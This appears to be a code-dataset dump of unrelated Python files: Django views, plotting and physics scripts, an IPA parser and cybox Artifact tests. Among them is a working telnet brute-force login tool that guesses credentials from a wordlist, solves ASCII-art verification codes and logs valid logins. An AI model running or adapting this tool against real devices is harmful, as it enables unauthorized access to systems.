err = str(sys.exc_info()[1])
#self.log.error(self.PluginName+" --gate "+data+" : "+err)
self.output.error(err)
return 1
return 0
def _get_device_name(self):
dev = re.sub('.*conf.', '', re.sub('.ip$', '', self.PluginFqn))
if re.search('^vlan', dev):
tmpstr = dev
dev = re.sub('vlans.', '', tmpstr)
if re.search('^bonds', dev):
tmpstr = dev
dev = re.sub('bonds.', '', tmpstr)
if re.search('^aliases', dev):
tmpstr = dev
dev = re.sub('aliases.', '', tmpstr)
return dev
def updateCurrentConfigNewValue(self, data_list, separator = ':'):
'''
Takes the parameter of a short set command, ip or mask
retrieve current configuration,change it with the new setting
and set the new valid config
Input:
data_list contains a list of Key:Values.
By default a Key and a Value is separated by ":".
ip:1.1.1.1
netmask:255.255.255.255
gateway:10.165.20.1
The separator can be overwriten by the "separator" parameter.
Note that the separator must be the same that the one used in the original configuration.
'''
try:
#keeps current config
dic = {'ip':'0.0.0.0','netmask':'0'}
#Get the current configuration
org_list = self.getConfig().split(' ')
IP_POS=0
MASK_POS=1
#get the current configured ip
for entry in org_list:
if re.search('/', entry):
curr_ip = entry.split('/')
dic['ip']=curr_ip[IP_POS]
dic['netmask']=curr_ip[MASK_POS]
#get the new config and change the old
for newEntry in data_list:
key_type,key = newEntry.split(separator)
if re.search('/', key):
ip_addr = key.split('/')
dic['ip']=ip_addr[IP_POS]
dic['netmask']=ip_addr[MASK_POS]
else:
if key_type == 'ip' or key_type == 'netmask':
dic[key_type] = key
elif key_type == 'gateway':
self.log.error("Unsupported option gateway")
else:
self.log.error("Unsupported option in updateCurrentConfigNewValue")
#todo
# Finaly recreate the list with the updated content
list = []
list.append(dic['ip']+'/'+dic['netmask'])
self.set(list)
except:
err = str(sys.exc_info()[1])
self.log.error("updateKeyListEntry "+self.PluginName+": "+err)
self.output.error(err)
return 1
return 0
def addSimpleListEntry(self, data_list):
''' add data_list to plugin entry of type List.
data_list contains a list of simple values to add.
'''
try:
org_list = self.getConfig().split(',')
org_list.extend(data_list)
self.set(org_list)
except:
err = str(sys.exc_info()[1])
self.log.error("addSimpleListEntry "+self.PluginName+": "+err)
self.output.error(err)
return 1
return 0
| gpl-2.0 | 1,970,613,429,138,987,000 | 27.213938 | 127 | 0.590763 | false |
crankycoder/oabutton-py | oabutton/oabutton/apps/bookmarklet/views.py | 1 | 2510 | from django.http import HttpResponse, HttpResponseServerError
from django.shortcuts import render
from django.core import serializers
from models import Event
try:
from simplejson import dumps
except:
from json import dumps
# TODO: we should really break up the view URLs here to separate the
# OAButton facing website from the bookmarklet URLs.
def homepage(req):
return render(req, 'bookmarklet/site/index.html')
def about(req):
return render(req, 'bookmarklet/site/about.html')
def show_stories(req):
# we only grab the 50 latest stories
# the original node code grabbed all stories which will kill your
# database
latest_stories = Event.objects.all().order_by('-pub_date')[:50]
count = Event.objects.count()
context = {'title': 'Stories', 'events': latest_stories, 'count': count}
return render(req, 'bookmarklet/site/stories.html', context)
def show_map(req):
# TODO: we need to make this smarter. Coallescing the lat/long
# data on a nightly basis and folding that down into clustered
# points would mean we throw less data down to the browser
count = Event.objects.count()
json_data = serializers.serialize("json", Event.objects.all())
context = {'title': 'Map', 'events': json_data, 'count': count }
return render(req, 'bookmarklet/site/map.html', context)
def get_json(req):
# Dump all data as JSON. This seems like a terrible idea when the
# dataset gets large.
json_data = serializers.serialize("json", Event.objects.all())
return HttpResponse(json_data, content_type="application/json")
def add(req):
# Display an entry page
# How does the DOI get in automatically? This seems really wrong.
# At the least, we need a test here to illustrate why this should
# work at all.
return render('sidebar/index.html', context={'url': req.query.url, 'doi': req.query.doi})
def add_post(req):
# Handle POST
event = Event()
# Where does the coords come from? This seems like it's using the
# HTML5 locationAPI. Need to dig around a bit
coords = req['coords'].split(',')
event.coords_lat = float(coords[0])
event.coords_lng = float(coords[1])
try:
event.save()
except Exception, e:
return HttpResponseServerError(e)
scholar_url = ''
if req.body['doi']:
scholar_url = 'http://scholar.google.com/scholar?cluster=' + 'http://dx.doi.org/' + req['doi']
return render('sidebar/success.html', {'scholar_url': scholar_url})
| mit | -3,371,336,796,552,659,500 | 34.352113 | 102 | 0.688048 | false |
ryanbressler/GraphSpectrometer | plotpredDecomp.py | 1 | 3795 | """
plotjsondecomp.py
Script to make plots from json files calculated by fiedler.py for random forest
predictor files.
usage:
python plotjsondecomp.python fiedler.out.json
or often:
ls *.json | xargs --max-procs=10 -I FILE python plotjsondecomp.py FILE
THis script also updates the json file to include two additional fields: the value of the grad
component of the hodge decomposition and the rank produced by it:
The best visualization of a random forest predictor is given by r1 and hodge.
{"f1": the first fiedler vector,
"f2": (if caclulated) the second fideler vector
"d": the node degrees,
"r1": the rank of each node in the first fiedler vector
"r2": the rank of each node in the second fiedler vector
"iByn": the index of the nodes by the string used to represent them in
the input file
"nByi": the string used to represent nodes in the input file by their
index in the graph
"adj": the adjascancy list,
["hodge": the values of the gradient from hodge decomposition,
"hodgerank": the hodge rank]}
"""
import os
import sys
import json
import numpy
from numpy import asarray, eye, outer, inner, dot, vstack
from numpy.random import seed, rand
from numpy.linalg import norm
from scipy.sparse.linalg import cg, lsqr
import scipy.sparse
from pydec import d, delta, simplicial_complex, abstract_simplicial_complex
import fiedler
def plotjson(fn):
"""
plotjson: make plots from json output of fiedler.py
fn: the filename of the json file
"""
fo=open(fn)
data=json.load(fo)
fo.close()
if "adj" in data:
(A,adj,Npts) = fiedler.adj_mat(data["adj"])
#A = (A.T - A)/2
A=A.tocoo()
pos=A.data!=0
skew = numpy.column_stack((A.row[pos],A.col[pos],A.data[pos])).tolist()
# method from ranking driver.py
asc = abstract_simplicial_complex([numpy.column_stack((A.row[pos],A.col[pos])).tolist()])
B1 = asc.chain_complex()[1] # boundary matrix
rank = lsqr(B1.T, A.data[pos])[0] # solve least squares problem
# sc = simplicial_complex(([[el] for el in range(0,A.shape[0])],numpy.column_stack((A.row[pos],A.col[pos])).tolist()))
# omega = sc.get_cochain(1)
# omega.v[:] = A.data[pos]
# p = omega.k
# alpha = sc.get_cochain(p - 1)
#
# alpha.v = rank
# v = A.data[pos]-d(alpha).v
#
# cyclic_adj_list=numpy.column_stack((A.row[pos],A.col[pos],v)).tolist()
# div_adj_list=numpy.column_stack((A.row[pos],A.col[pos],d(alpha).v)).tolist()
data["hodge"]=list(rank)
data["hodgerank"]=list(numpy.argsort(numpy.argsort(rank)))
print "Adding hodge results to %s"%(os.path.abspath(fn))
fo = open(fn,"w")
json.dump(data,fo, indent=2)
fo.close()
# A.data = A.data * .25
# alist=fiedler.adj_list(A)
# fn=fn+".abstract"
# #fiedler.doPlots(numpy.array(data["f1"]),-1*numpy.array(rank),numpy.array(data["d"]),alist,fn+".all.v.grad.",widths=[24],heights=[6],vsdeg=False,nByi=data["nByi"],directed=False)
# try:
# print "Ploting ", fn
# fiedler.doPlots(numpy.argsort(numpy.argsort(numpy.array(data["f1"]))),-1*numpy.array(rank),numpy.array(data["d"]),alist,fn+"fied.rank.v.hodge",widths=[24],heights=[16],vsdeg=False,nByi=data["nByi"],directed=False,dorank=False)
# except ValueError:
# print "ValueError ploting ", fn
# print "A", A.shape,"A.data",A.data.shape,A.row.shape,A.col.shape,"pos",pos.shape,"B1.T.shape", B1.T.shape, "A.data[pos]", A.data[pos].shape, "rank", rank.shape, "numpy.array(data[\"f1\"])", numpy.array(data["f1"]).shape
# pass
def main():
fn=sys.argv[1]
plotjson(fn)
if __name__ == '__main__':
main() | bsd-3-clause | 6,372,562,606,690,363,000 | 33.825688 | 240 | 0.635046 | false |
braian87b/BruteForceTelnetPy | brute_force_telnet_login.py | 1 | 6288 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import telnetlib
import sys
import os
import hashlib
cred_file = None
def get_hash_from_string(string):
hasher_engine = hashlib.md5()
hasher_engine.update(string)
return hasher_engine.hexdigest()
def port_scan(host):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect_ex((host, 23))
if connect == 0:
print "[+]\tPort 23: Open"
s.close()
return True
else:
print "[-]\tPort 23: Closed"
s.close()
return False
def save_last_index(last_index):
with open("last_index.txt", "w+") as f:
f.write(str(last_index))
def read_last_index():
try:
with open("last_index.txt", "r+") as f:
last_index = f.read()
except IOError as e:
last_index = 0
return int(last_index) if last_index else 0
def get_credentials(passwords_file):
last_index = read_last_index()
global cred_file
if not cred_file:
print "Opening...", passwords_file
cred_file = open(passwords_file, 'r')
for i in range(0, last_index):
cred_file.readline()
line = cred_file.readline()
user = ""
if ":" in line:
user_password = line.split(':')
user = user_password[0]
password = user_password[1]
else:
password = line
save_last_index(last_index + 1)
return user, password
def truncate(text, start=None, end=None):
if start:
text = text[text.find(start):]
if end:
text = text[:text.find(end) + len(end)]
return text
def truncate_including(text, start=None, end=None):
if start:
text = text[text.find(start) + len(start):]
if end:
text = text[:text.find(end)]
return text
def digit_ocr_verification_code(digit_text=""):
filename = "digit_" + get_hash_from_string(digit_text) + ".txt"
if os.path.exists(filename):
digit_value = open(filename, 'r').read()
else:
while True:
print "Unknown digit:"
print digit_text
digit_value = raw_input("Please enter digit (will be saved for later usage): ")
if len(digit_value) == 1:
break
with open(filename, 'w+') as f:
f.write(digit_value)
return digit_value
def ocr_verification_code(text=""):
"""
Function allows to read digits from text like
# ====================================================
# * * * * * * * * * * * * * * * *
# * * * * *
# * * * * * * * * * * * * *
# * * * * *
# * * * * *
# * * * * * * * * * * * * *
# ====================================================
"""
digits_spacing = 13
text = text.replace('\r\n', '\n')
text = truncate_including(text, '==\n', '\n==')
digits = [] # we store digits
for line in text.split('\n'): # we read digits line by line
if not digits:
digits = ["" for x in range(len(line) / digits_spacing)]
reading_line = line
line_parts = []
while True:
line_part = reading_line[:digits_spacing]
if line_part:
line_parts.append(reading_line[:digits_spacing].rstrip(' ')) # rstrip
reading_line = reading_line[digits_spacing:]
else:
break
for index, line_part in enumerate(line_parts):
digits[index] = digits[index] + line_part + '\n'
ocr = ""
for digit in digits:
ocr = ocr + digit_ocr_verification_code(digit)
return ocr
def brute_login(host, passwords_file):
tn = None # telnet connection
need_user = False # need's username
while True: # main while, we don't go out until Valid Cred. found
try:
if not tn:
asked_password_in_cnx = False
tn = telnetlib.Telnet(host)
# tn.debuglevel = 10
print "[-]\tPort 23: Connecting..."
while True: # while requesting input
response = tn.read_until(":", 1) # until input request
if "verification code:" in response:
verif_code = ocr_verification_code(response)
print "[+] Entering Verif. Code:\t" + verif_code
tn.write(verif_code + "\n")
elif "Login:" in response:
need_user = True
asked_password_in_cnx = False # Last time asked for password in this connection?
user, password = get_credentials(passwords_file)
print "[+] Trying user:\t" + user
tn.write(user + "\n")
elif "Password:" in response:
if asked_password_in_cnx and need_user:
tn.close() # we should try next pair user/password
break # TODO FIX: allow multiple password from same user
asked_password_in_cnx = True # Last time asked for password in this connection?
if not need_user: # didn't ask for username, we read password
user, password = get_credentials(passwords_file)
if not password:
print "[-] No more Credentials to try"
sys.exit(0)
print "[+] Trying password:\t" + password
tn.write(password + "\n")
if ">" in response:
with open("valid_credentials.txt", "a") as f:
print "[+] Valid Credentials found:\t" + ' : '.join((user, password))
f.write("Valid Credentials found: " + ' : '.join((user, password)) + '\n')
break # Get out from input request while
if ">" in response:
break # Get out from main while
except EOFError as e:
pass # Disconnected, no problem, we will connect again.
if __name__ == "__main__":
if port_scan(sys.argv[1]):
brute_login(sys.argv[1], sys.argv[2])
| mit | -6,661,056,122,699,512,000 | 33.549451 | 101 | 0.499682 | false |
ruozi/GetSchemeUrl_From_IPA | GetSchemeUrl.py | 1 | 1665 | #!/usr/bin/env python
#
# Scan IPA file and parse its Info.plist and report the SchemeUrl result.
#
# Copyright (c) 2015 by Ruozi,Pinssible. All rights reserved.
import zipfile
import os
import sys
import re
import plistlib
class GetSchemeUrl:
plist_file_rx = re.compile(r'Payload/.+?\.app/Info.plist$')
schemeurl_key_rx = re.compile(r'CFBundleURLSchemes')
def __init__(self,ipa_filename):
self.ipa_filename = ipa_filename
def get_filename_from_ipa(self):
zip_obj = zipfile.ZipFile(self.ipa_filename, 'r')
regx = GetSchemeUrl.plist_file_rx
filenames = zip_obj.namelist()
filename = ''
for fname in filenames:
if regx.search(fname):
filename = fname
break
return {'filename':filename, 'zip_obj': zip_obj}
def extract_scheme_url(self):
ipa_file = self.get_filename_from_ipa()
ipa_file = getter.get_filename_from_ipa()
plist_filename = ipa_file['filename']
zip_obj = ipa_file['zip_obj']
urlschmes = []
if plist_filename == '':
self.errors.append('Info.plist file not found in IPA')
else:
content = zip_obj.read(plist_filename)
data = plistlib.readPlistFromString(content)
urltypes = data['CFBundleURLTypes']
urlschemes = urltypes[0]['CFBundleURLSchemes']
return urlschemes
if __name__ == '__main__':
test_file_path = r'/Users/Ruozi/Music/iTunes/iTunes Media/Mobile Applications/SketchBook 3.1.2.ipa'
getter = GetSchemeUrl(test_file_path)
print getter.extract_scheme_url()
sys.exit(0)
| gpl-2.0 | -5,124,134,703,800,660,000 | 27.706897 | 103 | 0.618018 | false |
Casarella/TRAPPER | TRAPPER.py | 1 | 10626 | #RedTrProb.py
#TRAPPER - TRAnsition Probability Processing/computER
#c. Jan 27, 2017 - Clark Casarella
# Updated to output to a LaTeX friendly table to the output file
# Does not take uncertainty in mixing into account
import math as m
import scipy.constants as sc
import numpy as np
csvpath=input("Enter path to csv file (including file extension): ")
print('Using the input parameters from',str(csvpath)+':')
outpath=input("Enter output path/filename (will be a text file): ")
print('Output placed at:',outpath)
output_file=open(outpath,'w')
#see_weisskopf_units=input("Do you want to see the Weisskopf unit conversion? [Y/N]")
#csvpath='162Dy_GRID.csv'
#csvpath='../162Dy_GRID/162Dy_GRID.csv'
#output_file=open('out.TEST','w')
dtype_full=[('E_g','f8'),('E_g_error','f8'),
('I_g','f8'),('I_g_error','f8'),('I_g_total','f8'),
('delta_mixing','f8'),('delta_upper','f8'),('delta_lower','f8'),
('tau','f8'),('tau_up','f8'),('tau_down','f8'),
('alpha_conv','f8'),('alpha_conv_error','f8'),
('A','int'),('multipolarity','S6'),
('E_level','f8')]
ndtype=str
npnames=['E_g','E_g_error','I_g','I_g_error','I_g_total',
'delta_mixing','delta_upper','delta_lower',
'tau','tau_up','tau_down','alpha_conv','alpha_conv_error',
'A','multipolarity','E_level']
csvfile = np.genfromtxt(csvpath,delimiter=",",skip_header=1,names=npnames,dtype=dtype_full)
#print('array:',csvfile)
#Test single input section
#E_g=0.888157
#I_g=174.8
#I_tot=369.3
#delta=0
#tau=2830*10**-15
#alpha_conv=0.0032
#multipolarity='E2'
#A=162
#E_g=1.31303
#I_g=0.428
#I_tot=1
#delta=0.28
#delta_up=0.34
#tau=320*10**-15
#alpha_conv=0
#multipolarity='E2(M1)'
#A=160
def set_multipolarity():
"""
Returns and extracts the multipolarity of a transition
Decoded from UTF-8 encoding on the string keyed 'multipolarity'
"""
#multipolarity=csvfile[0][14].decode("utf-8")[-1]
if multipolarity[-1]=='1':
return 1
elif multipolarity[-1]=='2':
return 2
else:
#return 2
return 'E2(M1)'
def BwE(A):
"""
Weisskopf estimate for an electric type, multipolarity
l transition, in units of e^2*fm^l
(1 W.u. = XXX e^2fm^l)
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return 0.12**(2*l)/(4*m.pi)*(3/(l+3))**2*A**(2*l/3)
def BwM(A):
"""
Weisskopf estimate for an magnetic type, multipolarity l transition,
in units of mu_N^2
"""
l=set_multipolarity()
if l=='E2(M1)':
l=1
return 0.12**(2*(l-1))*10/m.pi*(3/(l+3))**2*A**(2*(l-1))
def doublefactorial(n):
"""
Double factorial (every other n factorialed)
"""
if n <=0:
return 1
else:
return n*doublefactorial(n-2)
def mult_coefficient():
"""
This coefficient removes angular momentum mixing from the transition
probabilities.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return l*(doublefactorial(2*l+1))**2/(l+1)
#return l*(2*l+1)**2/(l+1)
#print('Coefficient for L:',mult_coefficient())
#print('BwE:',BwE(162))
def mixing_fraction(delta):
"""
Multipole mixing fraction for any mixed-multipolarity transitions
Unitless, and calculates relative E2 strength to M1 B(E2) strength
"""
#delta=csvfile[1][14][5]
l=set_multipolarity()
if l=='E2':
l=2
if delta==0 or l==1:
return 1
elif delta!=0 and l=='E2(M1)':
return delta**2/(1+delta**2)
#print(mixing_fraction(0.64))
def BR():
"""
Returns branching ratio (ratio of measured intensity to total intensity leaving the state)
"""
return I_g/I_tot
#print('Mixing Fraction Delta:',mixing_fraction(delta))
#units from scipy - generally helps with precision
m_p=sc.value('proton mass energy equivalent in MeV')
hc=sc.value('Planck constant over 2 pi times c in MeV fm')
hbar=sc.value('Planck constant over 2 pi in eV s')/10**6
barn=10**2
def B_coefficients():
"""
Calculates coefficients for the final B(pl) calculation.
Makes an exception for E1 transitions, traditionally reported in mW.u.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if multipolarity=='E1':
return hbar/(8*m.pi)*mult_coefficient()*hc**(1+2*l)*1000
else:
return hbar/(8*m.pi)*mult_coefficient()*hc**(1+2*l)
def units():
"""
Corrects the units from e^2b^l to W.u.
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if multipolarity[0]=='E':
return barn**l*sc.alpha*sc.hbar/10**-9*sc.c/sc.e*BwE(A) # check here
elif multipolarity[0]=='M':
return hc*sc.alpha*BwM(A)*(hc/(2*m_p))**2 #check here again
#print('Units from MeVfm to W.u.:',units())
def latex_friendly_units():
"""
Returns LaTeX-friendly units for copying-pasting into LaTeX documents
"""
l=multipolarity
if l=='E1':
return 'mW.u.'
elif l=='E2':
return 'W.u.'
elif l=='M1':
return '$\mu_N^2$'
else:
return 'W.u. (mixed)'
def B(tau):
"""
Calculation of transition probability B(pl) from all inputs necessary
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
if l==1:
return round(mixing_fraction(delta)*BR()/(tau*10**-15*(1+alpha_conv)*E_g**(2*l+1))*B_coefficients()/units(),3)
else:
return round(mixing_fraction(delta)*BR()/(tau*10**-15*(1+alpha_conv)*E_g**(2*l+1))*B_coefficients()/units(),2)
#determine delta_upper bounds on error
def mixing_upper_bounds():
"""
Determines which bound should be used for a particular mixing fraction
- Used in error propagation -
If delta <0, then the most E2 mixing will occur at the most negative number
(delta-delta_lower)
if delta >0, then the most E2 mixing will occur at the most positive number
(delta+delta_upper)
"""
if delta<0:
return delta-delta_lower
elif delta>0:
return delta+delta_upper
else:
return 0
def mixing_lower_bounds():
"""
Performs a similar function to finding the upper bounds on mixing,
Only on the lower bounds
"""
if delta<0:
return delta+delta_upper
elif delta>0:
return delta-delta_lower
else:
return 0
#Error propagation for symmetric quantities:
def dBdE():
#"""
#Uncertainty in B with respect to gamma
#ray energy
#"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((-B(tau)/E_g*(2*l+1)*E_g_error)**2,3)
def dBdI():
"""
Uncertainty in B with respect to gamma
ray intensity
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((B(tau)/I_g*I_g_error)**2,3)**2
def dBdalpha():
"""
Uncertainty in B with respect to internal
conversion coefficient
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round((-B(tau)/(1+alpha_conv)*alpha_conv_error)**2,3)
"""
Asymmetric error is calculated via a 'consistent addition
technique' where B is calculated from the 'highest' value
and then subtracting the nominal value, etc
"""
def dBdtau_up():
"""
Calculation of B for the longest lifetime,
for use in error propagation
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round(B(tau_down),3)
def dBdtau_down():
"""
Calculation of B for the shortest lifetime,
for use in error propagation
"""
l=set_multipolarity()
if l=='E2(M1)':
l=2
return round(B(tau_up),3)
def uncertainty_tau_upper():
return round((-B(tau)+dBdtau_up())**2,3)
def uncertainty_tau_lower():
return round((B(tau)-dBdtau_down())**2,3)
#def calc_unc_delta_upper():
#"""
#This is an odd section, I need to calculate B under two
#delta conditions, upper and nominal,
#and subtract the two like I did for tau
#"""
#l=set_multipolarity()
#if l=='E2(M1)':
#tempB=B(tau)
#delta=mixing_upper_bounds()
#return -tempB+B(tau)
#else:
#return 0
#Aggregate uncertainty (upper bound)
def upper_uncertainty():
"""
Returns the upper bound for final, added in quadrature
uncertainty in B from any sources of uncertainty
in measured quantities.
"""
return round((dBdE()+dBdI()+dBdalpha()+uncertainty_tau_upper())**0.5,3)
#Aggregate uncertainty (lower bound)
def lower_uncertainty():
"""
Returns the lower bound for final, added in quadrature
uncertainty in B from any sources of uncertainty
in measured quantities.
"""
return round((dBdE()+dBdI()+dBdalpha()+uncertainty_tau_lower())**0.5,3)
#LaTeX Table header
output_file.write('\\begin{table}[ht]\n')
output_file.write('\\begin{tabular}{l|l|l|l|l|l|l}\n')
header1='E$_{lev}$ (keV) & E$_{\gamma}$ (keV) & I$_{\gamma}$ & ${\\tau}$ (fs)'
header2=' & $\pi\\ell$ & $\delta$ & B($\pi\\ell$) (W.u.) '
#Terminal Outputs - Not LaTeX friendly
output_file.write(header1+header2+'\\\\\hline\hline\n')
for row in list(range(len(csvfile))):
E_g=csvfile[row]['E_g']
E_g_error=csvfile[row]['E_g_error']
I_g=csvfile[row]['I_g']
I_g_error=csvfile[row]['I_g_error']
I_tot=csvfile[row]['I_g_total']
delta=csvfile[row]['delta_mixing']
delta_upper=csvfile[row]['delta_upper']
delta_lower=csvfile[row]['delta_lower']
tau=csvfile[row]['tau']
tau_up=csvfile[row]['tau_up']-tau
tau_down=tau-csvfile[row]['tau_down']
alpha_conv=csvfile[row]['alpha_conv']
alpha_conv_error=csvfile[row]['alpha_conv_error']
A=csvfile[row]['A']
multipolarity=csvfile[row]['multipolarity'].decode("utf-8")
E_lev=csvfile[row]['E_level']
#print('mixing',calc_unc_delta_upper(),tempB)
lineEnergy=str(round(E_lev,2)).ljust(16,' ')+'& '+(str(round(E_g*1000,2))+' ('+str(int(E_g_error*1000))+')').ljust(19,' ')+'& '
lineIntensity=(str(round(I_g,1))+' ('+str(int(I_g_error*10))+')').ljust(13,' ')+'& '+(str(int(tau))+'$^{+'+str(tau_up+tau)+'}_{'+str(tau_down-tau)+'}$').ljust(28,' ')+'& '
lineLifetime=str(multipolarity).ljust(10,' ')+'& '
lineDelta=(str(delta)+' $^{+'+str(delta_upper)+'}_{-'+str(delta_lower)+'}$').ljust(20,' ')+'& '
lineMult=(str(round(B(tau),2))+' $^{+'+str(round(-upper_uncertainty()+B(tau),2))+'}_{'+str(round(B(tau)-lower_uncertainty(),2))+'}$ '+latex_friendly_units()).ljust(30,' ')+'\\\\ \n'
output_file.write(lineEnergy+lineIntensity+lineLifetime+lineDelta+lineMult)
print('B('+multipolarity+')=',B(tau),'p\m',upper_uncertainty(),latex_friendly_units(),'for the',E_g*1000,'keV transition leaving the',E_lev,'keV state')
output_file.write('\\end{tabular}\n')
output_file.write('\caption{REMEMBER TO CHANGE TABLE CAPTION AND REFERENCE TAG HERE! \label{tab:BE2}}\n')
output_file.write('\\end{table}')
output_file.close()
| gpl-3.0 | 8,386,165,941,889,741,000 | 28.434903 | 185 | 0.621212 | false |
nathantspencer/webknossos_toolkit | swc_tools/swc_offset.py | 1 | 1563 | import sys
def index_of(line):
return line.split()[0]
def type_of(line):
return line.split()[1]
def x_of(line):
return line.split()[2]
def y_of(line):
return line.split()[3]
def z_of(line):
return line.split()[4]
def radius_of(line):
return line.split()[5]
def parent_of(line):
return line.split()[6]
def offset(swc_path, x_offset, y_offset, z_offset):
f = open(swc_path, 'r')
lines = f.readlines()
lines_to_write = []
f.close()
for line in lines:
line.strip()
new_index = index_of(line) + ' '
new_type = type_of(line) + ' '
new_radius = radius_of(line) + ' '
new_parent = parent_of(line) + '\n'
new_x = str(float(x_of(line)) + x_offset) + ' '
new_y = str(float(y_of(line)) + y_offset) + ' '
new_z = str(float(z_of(line)) + z_offset) + ' '
line_to_write = new_index + new_type + new_x + new_y + new_z + new_radius + new_parent
lines_to_write.append(line_to_write)
f = open(swc_path[:-4] + '_offset.swc', 'w')
for line in lines_to_write:
f.write(line)
f.close()
if __name__ == "__main__":
if len(sys.argv) != 5:
print('\nSWC_OFFSET -- Written by Nathan Spencer 2017')
print('Usage: python swc_offset.py ["path/to/swc/file.swc"] [float x-offset] [float y-offset] [float z-offset]')
else:
swc_file = sys.argv[1]
x_offset = float(sys.argv[2])
y_offset = float(sys.argv[3])
z_offset = float(sys.argv[4])
offset(swc_file, x_offset, y_offset, z_offset)
| mit | 7,372,109,832,491,850,000 | 25.491525 | 120 | 0.557901 | false |
CybOXProject/python-cybox | cybox/test/objects/artifact_test.py | 1 | 15713 | # Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
import base64
import unittest
from zlib import compress
from mixbox.vendor import six
from mixbox.vendor.six import u
from cybox.objects.artifact_object import (Artifact, Base64Encoding,
Bz2Compression, Encoding, EncodingFactory, Packaging, RawArtifact,
XOREncryption, ZlibCompression)
from cybox.test import round_trip
from cybox.test.objects import ObjectTestCase
class TestRawArtifact(unittest.TestCase):
def test_xml_output(self):
# A RawArtifact stores a Unicode string, even though it typically
# consists only of valid Base64 characters.
data = u("0123456789abcdef")
ra = RawArtifact(data)
expected_data = data.encode('utf-8')
self.assertTrue(expected_data in ra.to_xml())
class TestArtifactEncoding(unittest.TestCase):
def test_cannot_create_artifact_from_unicode_data(self):
self.assertRaises(ValueError, Artifact, u("abc123"))
def test_setting_ascii_artifact_data_no_packaging(self):
a = Artifact()
a.data = b"abc123"
self.assertEqual(six.binary_type, type(a.data))
self.assertEqual(six.text_type, type(a.packed_data))
def test_cannot_set_nonascii_data_with_no_packaging(self):
a = Artifact()
# You can set this data, but if you don't add any packaging, you should
# get an error when trying to get the packed data, since it can't be
# encoded as ASCII.
a.data = b"\x00abc123\xff"
self.assertEqual(six.binary_type, type(a.data))
self.assertRaises(ValueError, _get_packed_data, a)
# With Base64 encoding, we can retrieve this.
a.packaging = Packaging()
a.packaging.encoding.append(Base64Encoding())
self.assertEqual("AGFiYzEyM/8=", a.packed_data)
def test_setting_ascii_artifact_packed_data_no_packaging(self):
a = Artifact()
a.packed_data = u("abc123")
self.assertEqual(six.binary_type, type(a.data))
self.assertEqual(six.text_type, type(a.packed_data))
def test_cannot_set_nonascii_artifact_packed_data(self):
a = Artifact()
a.packed_data = u("\x00abc123\xff")
self.assertEqual(six.text_type, type(a.packed_data))
# TODO: Should this raise an error sooner, since there's nothing we can
# do at this point? There's no reason that the packed_data should
# contain non-ascii characters.
self.assertRaises(UnicodeEncodeError, _get_data, a)
class TestArtifact(ObjectTestCase, unittest.TestCase):
object_type = "ArtifactObjectType"
klass = Artifact
ascii_data = b"ABCDEFGHIJKLMNOPQRSTUVWZYZ0123456879"
binary_data = b"\xde\xad\xbe\xef Dead Beef"
# The raw_artifact data in a JSON/dict representation should always be
# ASCII byte data (typically Base64-encoded, but this is not required).
_full_dict = {
'raw_artifact': "Here is a blob of text.",
'type': Artifact.TYPE_NETWORK,
'xsi:type': object_type,
}
def test_set_data_and_packed_data(self):
a = Artifact()
self.assertEqual(a.data, None)
self.assertEqual(a.packed_data, None)
a.data = b"Blob"
self.assertRaises(ValueError, _set_packed_data, a, u("blob"))
a.data = None
a.packed_data = u("Blob")
self.assertRaises(ValueError, _set_data, a, b"blob")
a.packed_data = None
def test_round_trip(self):
# Without any packaging, the only data an Artifact can encode
# successfully is ASCII data.
a = Artifact(self.ascii_data, Artifact.TYPE_GENERIC)
a2 = round_trip(a, Artifact)
self.assertEqual(a.to_dict(), a2.to_dict())
def test_non_ascii_round_trip_raises_error(self):
a = Artifact(self.binary_data, Artifact.TYPE_GENERIC)
# Since the data is non-ASCII, this should raise an error.
self.assertRaises(ValueError, round_trip, a, Artifact)
def test_base64_encoding(self):
a = Artifact(self.binary_data)
a.packaging = Packaging()
a.packaging.encoding.append(Base64Encoding())
a2 = round_trip(a, Artifact)
self.assertEqual(self.binary_data, a2.data)
expected = base64.b64encode(self.binary_data).decode('ascii')
self.assertEqual(expected, a2.packed_data)
def test_zlib_base64_encoding(self):
a = Artifact(self.binary_data)
a.packaging = Packaging()
a.packaging.compression.append(ZlibCompression())
a.packaging.encoding.append(Base64Encoding())
a2 = round_trip(a, Artifact)
self.assertEqual(self.binary_data, a2.data)
expected = base64.b64encode(compress(self.binary_data)).decode('ascii')
self.assertEqual(expected, a2.packed_data)
def test_encryption(self):
a = Artifact(self.binary_data)
a.packaging = Packaging()
a.packaging.encryption.append(XOREncryption(0x4a))
a.packaging.encoding.append(Base64Encoding())
a2 = round_trip(a, Artifact)
self.assertEqual(self.binary_data, a2.data)
def test_compression(self):
a = Artifact(self.binary_data)
a.packaging = Packaging()
a.packaging.compression.append(Bz2Compression())
a.packaging.encryption.append(XOREncryption(0x4a))
a.packaging.encoding.append(Base64Encoding())
a2 = round_trip(a, Artifact)
self.assertEqual(self.binary_data, a2.data)
def test_custom_encoding(self):
@EncodingFactory.register_extension
class Base32Encoding(Encoding):
_ENCODING_TYPE = "Base32"
def __init__(self):
super(Base32Encoding, self).__init__(algorithm="Base32")
def pack(self, data):
return base64.b32encode(data)
def unpack(self, packed_data):
return base64.b32decode(packed_data)
a = Artifact(self.binary_data)
a.packaging = Packaging()
a.packaging.compression.append(Bz2Compression())
a.packaging.encryption.append(XOREncryption(0x4a))
a.packaging.encoding.append(Base32Encoding())
a2 = round_trip(a, Artifact)
self.assertEqual(self.binary_data, a2.data)
class TestArtifactInstance(ObjectTestCase, unittest.TestCase):
object_type = "ArtifactObjectType"
klass = Artifact
_full_dict = {
"packaging": {
"is_encrypted": False,
"is_compressed": False,
"encoding": [
{
"algorithm": "Base64"
}
]
},
"xsi:type": object_type,
